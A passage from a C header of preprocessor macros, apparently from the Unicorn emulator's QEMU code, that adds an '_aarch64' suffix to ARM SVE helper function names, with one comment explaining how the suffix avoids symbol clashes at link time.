#define helper_sve_umulh_zpzz_b helper_sve_umulh_zpzz_b_aarch64
#define helper_sve_umulh_zpzz_h helper_sve_umulh_zpzz_h_aarch64
#define helper_sve_umulh_zpzz_s helper_sve_umulh_zpzz_s_aarch64
#define helper_sve_umulh_zpzz_d helper_sve_umulh_zpzz_d_aarch64
#define helper_sve_sdiv_zpzz_s helper_sve_sdiv_zpzz_s_aarch64
#define helper_sve_sdiv_zpzz_d helper_sve_sdiv_zpzz_d_aarch64
#define helper_sve_udiv_zpzz_s helper_sve_udiv_zpzz_s_aarch64
#define helper_sve_udiv_zpzz_d helper_sve_udiv_zpzz_d_aarch64
#define helper_sve_asr_zpzz_b helper_sve_asr_zpzz_b_aarch64
#define helper_sve_lsr_zpzz_b helper_sve_lsr_zpzz_b_aarch64
#define helper_sve_lsl_zpzz_b helper_sve_lsl_zpzz_b_aarch64
#define helper_sve_asr_zpzz_h helper_sve_asr_zpzz_h_aarch64
#define helper_sve_lsr_zpzz_h helper_sve_lsr_zpzz_h_aarch64
#define helper_sve_lsl_zpzz_h helper_sve_lsl_zpzz_h_aarch64
#define helper_sve_asr_zpzz_s helper_sve_asr_zpzz_s_aarch64
#define helper_sve_lsr_zpzz_s helper_sve_lsr_zpzz_s_aarch64
#define helper_sve_lsl_zpzz_s helper_sve_lsl_zpzz_s_aarch64
#define helper_sve_asr_zpzz_d helper_sve_asr_zpzz_d_aarch64
#define helper_sve_lsr_zpzz_d helper_sve_lsr_zpzz_d_aarch64
#define helper_sve_lsl_zpzz_d helper_sve_lsl_zpzz_d_aarch64
#define helper_sve_asr_zpzw_b helper_sve_asr_zpzw_b_aarch64
#define helper_sve_lsr_zpzw_b helper_sve_lsr_zpzw_b_aarch64
#define helper_sve_lsl_zpzw_b helper_sve_lsl_zpzw_b_aarch64
#define helper_sve_asr_zpzw_h helper_sve_asr_zpzw_h_aarch64
#define helper_sve_lsr_zpzw_h helper_sve_lsr_zpzw_h_aarch64
#define helper_sve_lsl_zpzw_h helper_sve_lsl_zpzw_h_aarch64
#define helper_sve_asr_zpzw_s helper_sve_asr_zpzw_s_aarch64
#define helper_sve_lsr_zpzw_s helper_sve_lsr_zpzw_s_aarch64
#define helper_sve_lsl_zpzw_s helper_sve_lsl_zpzw_s_aarch64
#define helper_sve_cls_b helper_sve_cls_b_aarch64
#define helper_sve_cls_h helper_sve_cls_h_aarch64
#define helper_sve_cls_s helper_sve_cls_s_aarch64
#define helper_sve_cls_d helper_sve_cls_d_aarch64
#define helper_sve_clz_b helper_sve_clz_b_aarch64
#define helper_sve_clz_h helper_sve_clz_h_aarch64
#define helper_sve_clz_s helper_sve_clz_s_aarch64
#define helper_sve_clz_d helper_sve_clz_d_aarch64
#define helper_sve_cnt_zpz_b helper_sve_cnt_zpz_b_aarch64
#define helper_sve_cnt_zpz_h helper_sve_cnt_zpz_h_aarch64
#define helper_sve_cnt_zpz_s helper_sve_cnt_zpz_s_aarch64
#define helper_sve_cnt_zpz_d helper_sve_cnt_zpz_d_aarch64
#define helper_sve_cnot_b helper_sve_cnot_b_aarch64
#define helper_sve_cnot_h helper_sve_cnot_h_aarch64
#define helper_sve_cnot_s helper_sve_cnot_s_aarch64
#define helper_sve_cnot_d helper_sve_cnot_d_aarch64
#define helper_sve_fabs_h helper_sve_fabs_h_aarch64
#define helper_sve_fabs_s helper_sve_fabs_s_aarch64
#define helper_sve_fabs_d helper_sve_fabs_d_aarch64
#define helper_sve_fneg_h helper_sve_fneg_h_aarch64
#define helper_sve_fneg_s helper_sve_fneg_s_aarch64
#define helper_sve_fneg_d helper_sve_fneg_d_aarch64
#define helper_sve_not_zpz_b helper_sve_not_zpz_b_aarch64
#define helper_sve_not_zpz_h helper_sve_not_zpz_h_aarch64
#define helper_sve_not_zpz_s helper_sve_not_zpz_s_aarch64
#define helper_sve_not_zpz_d helper_sve_not_zpz_d_aarch64
#define helper_sve_sxtb_h helper_sve_sxtb_h_aarch64
#define helper_sve_sxtb_s helper_sve_sxtb_s_aarch64
#define helper_sve_sxth_s helper_sve_sxth_s_aarch64
#define helper_sve_sxtb_d helper_sve_sxtb_d_aarch64
#define helper_sve_sxth_d helper_sve_sxth_d_aarch64
#define helper_sve_sxtw_d helper_sve_sxtw_d_aarch64
#define helper_sve_uxtb_h helper_sve_uxtb_h_aarch64
#define helper_sve_uxtb_s helper_sve_uxtb_s_aarch64
#define helper_sve_uxth_s helper_sve_uxth_s_aarch64
#define helper_sve_uxtb_d helper_sve_uxtb_d_aarch64
#define helper_sve_uxth_d helper_sve_uxth_d_aarch64
#define helper_sve_uxtw_d helper_sve_uxtw_d_aarch64
#define helper_sve_abs_b helper_sve_abs_b_aarch64
#define helper_sve_abs_h helper_sve_abs_h_aarch64
#define helper_sve_abs_s helper_sve_abs_s_aarch64
#define helper_sve_abs_d helper_sve_abs_d_aarch64
#define helper_sve_neg_b helper_sve_neg_b_aarch64
#define helper_sve_neg_h helper_sve_neg_h_aarch64
#define helper_sve_neg_s helper_sve_neg_s_aarch64
#define helper_sve_neg_d helper_sve_neg_d_aarch64
#define helper_sve_revb_h helper_sve_revb_h_aarch64
#define helper_sve_revb_s helper_sve_revb_s_aarch64
#define helper_sve_revb_d helper_sve_revb_d_aarch64
#define helper_sve_revh_s helper_sve_revh_s_aarch64
#define helper_sve_revh_d helper_sve_revh_d_aarch64
#define helper_sve_revw_d helper_sve_revw_d_aarch64
#define helper_sve_rbit_b helper_sve_rbit_b_aarch64
#define helper_sve_rbit_h helper_sve_rbit_h_aarch64
#define helper_sve_rbit_s helper_sve_rbit_s_aarch64
#define helper_sve_rbit_d helper_sve_rbit_d_aarch64
#define helper_sve_asr_zzw_b helper_sve_asr_zzw_b_aarch64
#define helper_sve_lsr_zzw_b helper_sve_lsr_zzw_b_aarch64
#define helper_sve_lsl_zzw_b helper_sve_lsl_zzw_b_aarch64
#define helper_sve_asr_zzw_h helper_sve_asr_zzw_h_aarch64
#define helper_sve_lsr_zzw_h helper_sve_lsr_zzw_h_aarch64
#define helper_sve_lsl_zzw_h helper_sve_lsl_zzw_h_aarch64
#define helper_sve_asr_zzw_s helper_sve_asr_zzw_s_aarch64
#define helper_sve_lsr_zzw_s helper_sve_lsr_zzw_s_aarch64
#define helper_sve_lsl_zzw_s helper_sve_lsl_zzw_s_aarch64
#define helper_sve_orv_b helper_sve_orv_b_aarch64
#define helper_sve_orv_h helper_sve_orv_h_aarch64
#define helper_sve_orv_s helper_sve_orv_s_aarch64
#define helper_sve_orv_d helper_sve_orv_d_aarch64
#define helper_sve_eorv_b helper_sve_eorv_b_aarch64
#define helper_sve_eorv_h helper_sve_eorv_h_aarch64
#define helper_sve_eorv_s helper_sve_eorv_s_aarch64
#define helper_sve_eorv_d helper_sve_eorv_d_aarch64
#define helper_sve_andv_b helper_sve_andv_b_aarch64
#define helper_sve_andv_h helper_sve_andv_h_aarch64
#define helper_sve_andv_s helper_sve_andv_s_aarch64
#define helper_sve_andv_d helper_sve_andv_d_aarch64
#define helper_sve_saddv_b helper_sve_saddv_b_aarch64
#define helper_sve_saddv_h helper_sve_saddv_h_aarch64
#define helper_sve_saddv_s helper_sve_saddv_s_aarch64
#define helper_sve_uaddv_b helper_sve_uaddv_b_aarch64
#define helper_sve_uaddv_h helper_sve_uaddv_h_aarch64
#define helper_sve_uaddv_s helper_sve_uaddv_s_aarch64
#define helper_sve_uaddv_d helper_sve_uaddv_d_aarch64
#define helper_sve_smaxv_b helper_sve_smaxv_b_aarch64
#define helper_sve_smaxv_h helper_sve_smaxv_h_aarch64
#define helper_sve_smaxv_s helper_sve_smaxv_s_aarch64
#define helper_sve_smaxv_d helper_sve_smaxv_d_aarch64
#define helper_sve_umaxv_b helper_sve_umaxv_b_aarch64
#define helper_sve_umaxv_h helper_sve_umaxv_h_aarch64
#define helper_sve_umaxv_s helper_sve_umaxv_s_aarch64
#define helper_sve_umaxv_d helper_sve_umaxv_d_aarch64
#define helper_sve_sminv_b helper_sve_sminv_b_aarch64
#define helper_sve_sminv_h helper_sve_sminv_h_aarch64
#define helper_sve_sminv_s helper_sve_sminv_s_aarch64
#define helper_sve_sminv_d helper_sve_sminv_d_aarch64
#define helper_sve_uminv_b helper_sve_uminv_b_aarch64
#define helper_sve_uminv_h helper_sve_uminv_h_aarch64
#define helper_sve_uminv_s helper_sve_uminv_s_aarch64
#define helper_sve_uminv_d helper_sve_uminv_d_aarch64
#define helper_sve_subri_b helper_sve_subri_b_aarch64
#define helper_sve_subri_h helper_sve_subri_h_aarch64
#define helper_sve_subri_s helper_sve_subri_s_aarch64
#define helper_sve_subri_d helper_sve_subri_d_aarch64
#define helper_sve_smaxi_b helper_sve_smaxi_b_aarch64
#define helper_sve_smaxi_h helper_sve_smaxi_h_aarch64
#define helper_sve_smaxi_s helper_sve_smaxi_s_aarch64
#define helper_sve_smaxi_d helper_sve_smaxi_d_aarch64
#define helper_sve_smini_b helper_sve_smini_b_aarch64
#define helper_sve_smini_h helper_sve_smini_h_aarch64
#define helper_sve_smini_s helper_sve_smini_s_aarch64
#define helper_sve_smini_d helper_sve_smini_d_aarch64
#define helper_sve_umaxi_b helper_sve_umaxi_b_aarch64
#define helper_sve_umaxi_h helper_sve_umaxi_h_aarch64
#define helper_sve_umaxi_s helper_sve_umaxi_s_aarch64
#define helper_sve_umaxi_d helper_sve_umaxi_d_aarch64
#define helper_sve_umini_b helper_sve_umini_b_aarch64
#define helper_sve_umini_h helper_sve_umini_h_aarch64
#define helper_sve_umini_s helper_sve_umini_s_aarch64
#define helper_sve_umini_d helper_sve_umini_d_aarch64
#define helper_sve_pfirst helper_sve_pfirst_aarch64
#define helper_sve_pnext helper_sve_pnext_aarch64
#define helper_sve_clr_b helper_sve_clr_b_aarch64
#define helper_sve_clr_h helper_sve_clr_h_aarch64
#define helper_sve_clr_s helper_sve_clr_s_aarch64
#define helper_sve_clr_d helper_sve_clr_d_aarch64
#define helper_sve_movz_b helper_sve_movz_b_aarch64
#define helper_sve_movz_h helper_sve_movz_h_aarch64
#define helper_sve_movz_s helper_sve_movz_s_aarch64
#define helper_sve_movz_d helper_sve_movz_d_aarch64
#define helper_sve_asr_zpzi_b helper_sve_asr_zpzi_b_aarch64
#define helper_sve_asr_zpzi_h helper_sve_asr_zpzi_h_aarch64
#define helper_sve_asr_zpzi_s helper_sve_asr_zpzi_s_aarch64
#define helper_sve_asr_zpzi_d helper_sve_asr_zpzi_d_aarch64
#define helper_sve_lsr_zpzi_b helper_sve_lsr_zpzi_b_aarch64
#define helper_sve_lsr_zpzi_h helper_sve_lsr_zpzi_h_aarch64
#define helper_sve_lsr_zpzi_s helper_sve_lsr_zpzi_s_aarch64
#define helper_sve_lsr_zpzi_d helper_sve_lsr_zpzi_d_aarch64
#define helper_sve_lsl_zpzi_b helper_sve_lsl_zpzi_b_aarch64
#define helper_sve_lsl_zpzi_h helper_sve_lsl_zpzi_h_aarch64
#define helper_sve_lsl_zpzi_s helper_sve_lsl_zpzi_s_aarch64
#define helper_sve_lsl_zpzi_d helper_sve_lsl_zpzi_d_aarch64
#define helper_sve_asrd_b helper_sve_asrd_b_aarch64
#define helper_sve_asrd_h helper_sve_asrd_h_aarch64
#define helper_sve_asrd_s helper_sve_asrd_s_aarch64
#define helper_sve_asrd_d helper_sve_asrd_d_aarch64
#define helper_sve_mla_b helper_sve_mla_b_aarch64
#define helper_sve_mls_b helper_sve_mls_b_aarch64
#define helper_sve_mla_h helper_sve_mla_h_aarch64
#define helper_sve_mls_h helper_sve_mls_h_aarch64
#define helper_sve_mla_s helper_sve_mla_s_aarch64
#define helper_sve_mls_s helper_sve_mls_s_aarch64
#define helper_sve_mla_d helper_sve_mla_d_aarch64
#define helper_sve_mls_d helper_sve_mls_d_aarch64
#define helper_sve_index_b helper_sve_index_b_aarch64
#define helper_sve_index_h helper_sve_index_h_aarch64
#define helper_sve_index_s helper_sve_index_s_aarch64
#define helper_sve_index_d helper_sve_index_d_aarch64
#define helper_sve_adr_p32 helper_sve_adr_p32_aarch64
#define helper_sve_adr_p64 helper_sve_adr_p64_aarch64
#define helper_sve_adr_s32 helper_sve_adr_s32_aarch64
#define helper_sve_adr_u32 helper_sve_adr_u32_aarch64
#define helper_sve_fexpa_h helper_sve_fexpa_h_aarch64
#define helper_sve_fexpa_s helper_sve_fexpa_s_aarch64
#define helper_sve_fexpa_d helper_sve_fexpa_d_aarch64
#define helper_sve_ftssel_h helper_sve_ftssel_h_aarch64
#define helper_sve_ftssel_s helper_sve_ftssel_s_aarch64
#define helper_sve_ftssel_d helper_sve_ftssel_d_aarch64
#define helper_sve_sqaddi_b helper_sve_sqaddi_b_aarch64
#define helper_sve_sqaddi_h helper_sve_sqaddi_h_aarch64
#define helper_sve_sqaddi_s helper_sve_sqaddi_s_aarch64
#define helper_sve_sqaddi_d helper_sve_sqaddi_d_aarch64
#define helper_sve_uqaddi_b helper_sve_uqaddi_b_aarch64
#define helper_sve_uqaddi_h helper_sve_uqaddi_h_aarch64
#define helper_sve_uqaddi_s helper_sve_uqaddi_s_aarch64
#define helper_sve_uqaddi_d helper_sve_uqaddi_d_aarch64
#define helper_sve_uqsubi_d helper_sve_uqsubi_d_aarch64
#define helper_sve_cpy_m_b helper_sve_cpy_m_b_aarch64
#define helper_sve_cpy_m_h helper_sve_cpy_m_h_aarch64
#define helper_sve_cpy_m_s helper_sve_cpy_m_s_aarch64
#define helper_sve_cpy_m_d helper_sve_cpy_m_d_aarch64
#define helper_sve_cpy_z_b helper_sve_cpy_z_b_aarch64
#define helper_sve_cpy_z_h helper_sve_cpy_z_h_aarch64
#define helper_sve_cpy_z_s helper_sve_cpy_z_s_aarch64
#define helper_sve_cpy_z_d helper_sve_cpy_z_d_aarch64
#define helper_sve_ext helper_sve_ext_aarch64
#define helper_sve_insr_b helper_sve_insr_b_aarch64
#define helper_sve_insr_h helper_sve_insr_h_aarch64
#define helper_sve_insr_s helper_sve_insr_s_aarch64
#define helper_sve_insr_d helper_sve_insr_d_aarch64
#define helper_sve_rev_b helper_sve_rev_b_aarch64
#define helper_sve_rev_h helper_sve_rev_h_aarch64
#define helper_sve_rev_s helper_sve_rev_s_aarch64
#define helper_sve_rev_d helper_sve_rev_d_aarch64
#define helper_sve_tbl_b helper_sve_tbl_b_aarch64
#define helper_sve_tbl_h helper_sve_tbl_h_aarch64
#define helper_sve_tbl_s helper_sve_tbl_s_aarch64
#define helper_sve_tbl_d helper_sve_tbl_d_aarch64
#define helper_sve_sunpk_h helper_sve_sunpk_h_aarch64
#define helper_sve_sunpk_s helper_sve_sunpk_s_aarch64
#define helper_sve_sunpk_d helper_sve_sunpk_d_aarch64
#define helper_sve_uunpk_h helper_sve_uunpk_h_aarch64
#define helper_sve_uunpk_s helper_sve_uunpk_s_aarch64
#define helper_sve_uunpk_d helper_sve_uunpk_d_aarch64
#define helper_sve_zip_p helper_sve_zip_p_aarch64
#define helper_sve_uzp_p helper_sve_uzp_p_aarch64
#define helper_sve_trn_p helper_sve_trn_p_aarch64
#define helper_sve_rev_p helper_sve_rev_p_aarch64
#define helper_sve_punpk_p helper_sve_punpk_p_aarch64
#define helper_sve_zip_b helper_sve_zip_b_aarch64
#define helper_sve_zip_h helper_sve_zip_h_aarch64
#define helper_sve_zip_s helper_sve_zip_s_aarch64
#define helper_sve_zip_d helper_sve_zip_d_aarch64
#define helper_sve_uzp_b helper_sve_uzp_b_aarch64
#define helper_sve_uzp_h helper_sve_uzp_h_aarch64
#define helper_sve_uzp_s helper_sve_uzp_s_aarch64
#define helper_sve_uzp_d helper_sve_uzp_d_aarch64
#define helper_sve_trn_b helper_sve_trn_b_aarch64
#define helper_sve_trn_h helper_sve_trn_h_aarch64
#define helper_sve_trn_s helper_sve_trn_s_aarch64
#define helper_sve_trn_d helper_sve_trn_d_aarch64
#define helper_sve_compact_s helper_sve_compact_s_aarch64
#define helper_sve_compact_d helper_sve_compact_d_aarch64
#define helper_sve_last_active_element helper_sve_last_active_element_aarch64
#define helper_sve_splice helper_sve_splice_aarch64
#define helper_sve_sel_zpzz_b helper_sve_sel_zpzz_b_aarch64
#define helper_sve_sel_zpzz_h helper_sve_sel_zpzz_h_aarch64
#define helper_sve_sel_zpzz_s helper_sve_sel_zpzz_s_aarch64
#define helper_sve_sel_zpzz_d helper_sve_sel_zpzz_d_aarch64
#define helper_sve_cmpeq_ppzz_b helper_sve_cmpeq_ppzz_b_aarch64
#define helper_sve_cmpeq_ppzz_h helper_sve_cmpeq_ppzz_h_aarch64
#define helper_sve_cmpeq_ppzz_s helper_sve_cmpeq_ppzz_s_aarch64
#define helper_sve_cmpeq_ppzz_d helper_sve_cmpeq_ppzz_d_aarch64
#define helper_sve_cmpne_ppzz_b helper_sve_cmpne_ppzz_b_aarch64
#define helper_sve_cmpne_ppzz_h helper_sve_cmpne_ppzz_h_aarch64
#define helper_sve_cmpne_ppzz_s helper_sve_cmpne_ppzz_s_aarch64
#define helper_sve_cmpne_ppzz_d helper_sve_cmpne_ppzz_d_aarch64
#define helper_sve_cmpgt_ppzz_b helper_sve_cmpgt_ppzz_b_aarch64
#define helper_sve_cmpgt_ppzz_h helper_sve_cmpgt_ppzz_h_aarch64
#define helper_sve_cmpgt_ppzz_s helper_sve_cmpgt_ppzz_s_aarch64
#define helper_sve_cmpgt_ppzz_d helper_sve_cmpgt_ppzz_d_aarch64
#define helper_sve_cmpge_ppzz_b helper_sve_cmpge_ppzz_b_aarch64
#define helper_sve_cmpge_ppzz_h helper_sve_cmpge_ppzz_h_aarch64
#define helper_sve_cmpge_ppzz_s helper_sve_cmpge_ppzz_s_aarch64
#define helper_sve_cmpge_ppzz_d helper_sve_cmpge_ppzz_d_aarch64
#define helper_sve_cmphi_ppzz_b helper_sve_cmphi_ppzz_b_aarch64
#define helper_sve_cmphi_ppzz_h helper_sve_cmphi_ppzz_h_aarch64
#define helper_sve_cmphi_ppzz_s helper_sve_cmphi_ppzz_s_aarch64
#define helper_sve_cmphi_ppzz_d helper_sve_cmphi_ppzz_d_aarch64
#define helper_sve_cmphs_ppzz_b helper_sve_cmphs_ppzz_b_aarch64
#define helper_sve_cmphs_ppzz_h helper_sve_cmphs_ppzz_h_aarch64
#define helper_sve_cmphs_ppzz_s helper_sve_cmphs_ppzz_s_aarch64
#define helper_sve_cmphs_ppzz_d helper_sve_cmphs_ppzz_d_aarch64
#define helper_sve_cmpeq_ppzw_b helper_sve_cmpeq_ppzw_b_aarch64
#define helper_sve_cmpeq_ppzw_h helper_sve_cmpeq_ppzw_h_aarch64
#define helper_sve_cmpeq_ppzw_s helper_sve_cmpeq_ppzw_s_aarch64
#define helper_sve_cmpne_ppzw_b helper_sve_cmpne_ppzw_b_aarch64
#define helper_sve_cmpne_ppzw_h helper_sve_cmpne_ppzw_h_aarch64
#define helper_sve_cmpne_ppzw_s helper_sve_cmpne_ppzw_s_aarch64
#define helper_sve_cmpgt_ppzw_b helper_sve_cmpgt_ppzw_b_aarch64
#define helper_sve_cmpgt_ppzw_h helper_sve_cmpgt_ppzw_h_aarch64
#define helper_sve_cmpgt_ppzw_s helper_sve_cmpgt_ppzw_s_aarch64
#define helper_sve_cmpge_ppzw_b helper_sve_cmpge_ppzw_b_aarch64
#define helper_sve_cmpge_ppzw_h helper_sve_cmpge_ppzw_h_aarch64
#define helper_sve_cmpge_ppzw_s helper_sve_cmpge_ppzw_s_aarch64
#define helper_sve_cmphi_ppzw_b helper_sve_cmphi_ppzw_b_aarch64
#define helper_sve_cmphi_ppzw_h helper_sve_cmphi_ppzw_h_aarch64
#define helper_sve_cmphi_ppzw_s helper_sve_cmphi_ppzw_s_aarch64
#define helper_sve_cmphs_ppzw_b helper_sve_cmphs_ppzw_b_aarch64
#define helper_sve_cmphs_ppzw_h helper_sve_cmphs_ppzw_h_aarch64
#define helper_sve_cmphs_ppzw_s helper_sve_cmphs_ppzw_s_aarch64
#define helper_sve_cmplt_ppzw_b helper_sve_cmplt_ppzw_b_aarch64
#define helper_sve_cmplt_ppzw_h helper_sve_cmplt_ppzw_h_aarch64
#define helper_sve_cmplt_ppzw_s helper_sve_cmplt_ppzw_s_aarch64
#define helper_sve_cmple_ppzw_b helper_sve_cmple_ppzw_b_aarch64
#define helper_sve_cmple_ppzw_h helper_sve_cmple_ppzw_h_aarch64
#define helper_sve_cmple_ppzw_s helper_sve_cmple_ppzw_s_aarch64
#define helper_sve_cmplo_ppzw_b helper_sve_cmplo_ppzw_b_aarch64
#define helper_sve_cmplo_ppzw_h helper_sve_cmplo_ppzw_h_aarch64
#define helper_sve_cmplo_ppzw_s helper_sve_cmplo_ppzw_s_aarch64
#define helper_sve_cmpls_ppzw_b helper_sve_cmpls_ppzw_b_aarch64
#define helper_sve_cmpls_ppzw_h helper_sve_cmpls_ppzw_h_aarch64
#define helper_sve_cmpls_ppzw_s helper_sve_cmpls_ppzw_s_aarch64
#define helper_sve_cmpeq_ppzi_b helper_sve_cmpeq_ppzi_b_aarch64
#define helper_sve_cmpeq_ppzi_h helper_sve_cmpeq_ppzi_h_aarch64
#define helper_sve_cmpeq_ppzi_s helper_sve_cmpeq_ppzi_s_aarch64
#define helper_sve_cmpeq_ppzi_d helper_sve_cmpeq_ppzi_d_aarch64
#define helper_sve_cmpne_ppzi_b helper_sve_cmpne_ppzi_b_aarch64
#define helper_sve_cmpne_ppzi_h helper_sve_cmpne_ppzi_h_aarch64
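/*
 * Link-time effect, sketched: QEMU's target code is compiled once per
 * architecture, so the arm and aarch64 objects would otherwise both
 * define symbols such as raise_exception (renamed above).  With the
 * per-target suffix they become raise_exception_arm and
 * raise_exception_aarch64 (the _arm name is assumed by analogy with
 * this header), letting a single libunicorn carry every target.
 */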
#define helper_sve_cmpne_ppzi_s helper_sve_cmpne_ppzi_s_aarch64
#define helper_sve_cmpne_ppzi_d helper_sve_cmpne_ppzi_d_aarch64
#define helper_sve_cmpgt_ppzi_b helper_sve_cmpgt_ppzi_b_aarch64
#define helper_sve_cmpgt_ppzi_h helper_sve_cmpgt_ppzi_h_aarch64
#define helper_sve_cmpgt_ppzi_s helper_sve_cmpgt_ppzi_s_aarch64
#define helper_sve_cmpgt_ppzi_d helper_sve_cmpgt_ppzi_d_aarch64
#define helper_sve_cmpge_ppzi_b helper_sve_cmpge_ppzi_b_aarch64
#define helper_sve_cmpge_ppzi_h helper_sve_cmpge_ppzi_h_aarch64
#define helper_sve_cmpge_ppzi_s helper_sve_cmpge_ppzi_s_aarch64
#define helper_sve_cmpge_ppzi_d helper_sve_cmpge_ppzi_d_aarch64
#define helper_sve_cmphi_ppzi_b helper_sve_cmphi_ppzi_b_aarch64
#define helper_sve_cmphi_ppzi_h helper_sve_cmphi_ppzi_h_aarch64
#define helper_sve_cmphi_ppzi_s helper_sve_cmphi_ppzi_s_aarch64
#define helper_sve_cmphi_ppzi_d helper_sve_cmphi_ppzi_d_aarch64
#define helper_sve_cmphs_ppzi_b helper_sve_cmphs_ppzi_b_aarch64
#define helper_sve_cmphs_ppzi_h helper_sve_cmphs_ppzi_h_aarch64
#define helper_sve_cmphs_ppzi_s helper_sve_cmphs_ppzi_s_aarch64
#define helper_sve_cmphs_ppzi_d helper_sve_cmphs_ppzi_d_aarch64
#define helper_sve_cmplt_ppzi_b helper_sve_cmplt_ppzi_b_aarch64
#define helper_sve_cmplt_ppzi_h helper_sve_cmplt_ppzi_h_aarch64
#define helper_sve_cmplt_ppzi_s helper_sve_cmplt_ppzi_s_aarch64
#define helper_sve_cmplt_ppzi_d helper_sve_cmplt_ppzi_d_aarch64
#define helper_sve_cmple_ppzi_b helper_sve_cmple_ppzi_b_aarch64
#define helper_sve_cmple_ppzi_h helper_sve_cmple_ppzi_h_aarch64
#define helper_sve_cmple_ppzi_s helper_sve_cmple_ppzi_s_aarch64
#define helper_sve_cmple_ppzi_d helper_sve_cmple_ppzi_d_aarch64
#define helper_sve_cmplo_ppzi_b helper_sve_cmplo_ppzi_b_aarch64
#define helper_sve_cmplo_ppzi_h helper_sve_cmplo_ppzi_h_aarch64
#define helper_sve_cmplo_ppzi_s helper_sve_cmplo_ppzi_s_aarch64
#define helper_sve_cmplo_ppzi_d helper_sve_cmplo_ppzi_d_aarch64
#define helper_sve_cmpls_ppzi_b helper_sve_cmpls_ppzi_b_aarch64
#define helper_sve_cmpls_ppzi_h helper_sve_cmpls_ppzi_h_aarch64
#define helper_sve_cmpls_ppzi_s helper_sve_cmpls_ppzi_s_aarch64
#define helper_sve_cmpls_ppzi_d helper_sve_cmpls_ppzi_d_aarch64
#define helper_sve_brkpa helper_sve_brkpa_aarch64
#define helper_sve_brkpas helper_sve_brkpas_aarch64
#define helper_sve_brkpb helper_sve_brkpb_aarch64
#define helper_sve_brkpbs helper_sve_brkpbs_aarch64
#define helper_sve_brka_z helper_sve_brka_z_aarch64
#define helper_sve_brkas_z helper_sve_brkas_z_aarch64
#define helper_sve_brkb_z helper_sve_brkb_z_aarch64
#define helper_sve_brkbs_z helper_sve_brkbs_z_aarch64
#define helper_sve_brka_m helper_sve_brka_m_aarch64
#define helper_sve_brkas_m helper_sve_brkas_m_aarch64
#define helper_sve_brkb_m helper_sve_brkb_m_aarch64
#define helper_sve_brkbs_m helper_sve_brkbs_m_aarch64
#define helper_sve_brkn helper_sve_brkn_aarch64
#define helper_sve_brkns helper_sve_brkns_aarch64
#define helper_sve_cntp helper_sve_cntp_aarch64
#define helper_sve_while helper_sve_while_aarch64
#define helper_sve_faddv_h helper_sve_faddv_h_aarch64
#define helper_sve_faddv_s helper_sve_faddv_s_aarch64
#define helper_sve_faddv_d helper_sve_faddv_d_aarch64
#define helper_sve_fminnmv_h helper_sve_fminnmv_h_aarch64
#define helper_sve_fminnmv_s helper_sve_fminnmv_s_aarch64
#define helper_sve_fminnmv_d helper_sve_fminnmv_d_aarch64
#define helper_sve_fmaxnmv_h helper_sve_fmaxnmv_h_aarch64
#define helper_sve_fmaxnmv_s helper_sve_fmaxnmv_s_aarch64
#define helper_sve_fmaxnmv_d helper_sve_fmaxnmv_d_aarch64
#define helper_sve_fminv_h helper_sve_fminv_h_aarch64
#define helper_sve_fminv_s helper_sve_fminv_s_aarch64
#define helper_sve_fminv_d helper_sve_fminv_d_aarch64
#define helper_sve_fmaxv_h helper_sve_fmaxv_h_aarch64
#define helper_sve_fmaxv_s helper_sve_fmaxv_s_aarch64
#define helper_sve_fmaxv_d helper_sve_fmaxv_d_aarch64
#define helper_sve_fadda_h helper_sve_fadda_h_aarch64
#define helper_sve_fadda_s helper_sve_fadda_s_aarch64
#define helper_sve_fadda_d helper_sve_fadda_d_aarch64
#define helper_sve_fadd_h helper_sve_fadd_h_aarch64
#define helper_sve_fadd_s helper_sve_fadd_s_aarch64
#define helper_sve_fadd_d helper_sve_fadd_d_aarch64
#define helper_sve_fsub_h helper_sve_fsub_h_aarch64
#define helper_sve_fsub_s helper_sve_fsub_s_aarch64
#define helper_sve_fsub_d helper_sve_fsub_d_aarch64
#define helper_sve_fmul_h helper_sve_fmul_h_aarch64
#define helper_sve_fmul_s helper_sve_fmul_s_aarch64
#define helper_sve_fmul_d helper_sve_fmul_d_aarch64
#define helper_sve_fdiv_h helper_sve_fdiv_h_aarch64
#define helper_sve_fdiv_s helper_sve_fdiv_s_aarch64
#define helper_sve_fdiv_d helper_sve_fdiv_d_aarch64
#define helper_sve_fmin_h helper_sve_fmin_h_aarch64
#define helper_sve_fmin_s helper_sve_fmin_s_aarch64
#define helper_sve_fmin_d helper_sve_fmin_d_aarch64
#define helper_sve_fmax_h helper_sve_fmax_h_aarch64
#define helper_sve_fmax_s helper_sve_fmax_s_aarch64
#define helper_sve_fmax_d helper_sve_fmax_d_aarch64
#define helper_sve_fminnum_h helper_sve_fminnum_h_aarch64
#define helper_sve_fminnum_s helper_sve_fminnum_s_aarch64
#define helper_sve_fminnum_d helper_sve_fminnum_d_aarch64
#define helper_sve_fmaxnum_h helper_sve_fmaxnum_h_aarch64
#define helper_sve_fmaxnum_s helper_sve_fmaxnum_s_aarch64
#define helper_sve_fmaxnum_d helper_sve_fmaxnum_d_aarch64
#define helper_sve_fabd_h helper_sve_fabd_h_aarch64
#define helper_sve_fabd_s helper_sve_fabd_s_aarch64
#define helper_sve_fabd_d helper_sve_fabd_d_aarch64
#define helper_sve_fscalbn_h helper_sve_fscalbn_h_aarch64
#define helper_sve_fscalbn_s helper_sve_fscalbn_s_aarch64
#define helper_sve_fscalbn_d helper_sve_fscalbn_d_aarch64
#define helper_sve_fmulx_h helper_sve_fmulx_h_aarch64
#define helper_sve_fmulx_s helper_sve_fmulx_s_aarch64
#define helper_sve_fmulx_d helper_sve_fmulx_d_aarch64
#define helper_sve_fadds_h helper_sve_fadds_h_aarch64
#define helper_sve_fadds_s helper_sve_fadds_s_aarch64
#define helper_sve_fadds_d helper_sve_fadds_d_aarch64
#define helper_sve_fsubs_h helper_sve_fsubs_h_aarch64
#define helper_sve_fsubs_s helper_sve_fsubs_s_aarch64
#define helper_sve_fsubs_d helper_sve_fsubs_d_aarch64
#define helper_sve_fmuls_h helper_sve_fmuls_h_aarch64
#define helper_sve_fmuls_s helper_sve_fmuls_s_aarch64
#define helper_sve_fmuls_d helper_sve_fmuls_d_aarch64
#define helper_sve_fsubrs_h helper_sve_fsubrs_h_aarch64
#define helper_sve_fsubrs_s helper_sve_fsubrs_s_aarch64
#define helper_sve_fsubrs_d helper_sve_fsubrs_d_aarch64
#define helper_sve_fmaxnms_h helper_sve_fmaxnms_h_aarch64
#define helper_sve_fmaxnms_s helper_sve_fmaxnms_s_aarch64
#define helper_sve_fmaxnms_d helper_sve_fmaxnms_d_aarch64
#define helper_sve_fminnms_h helper_sve_fminnms_h_aarch64
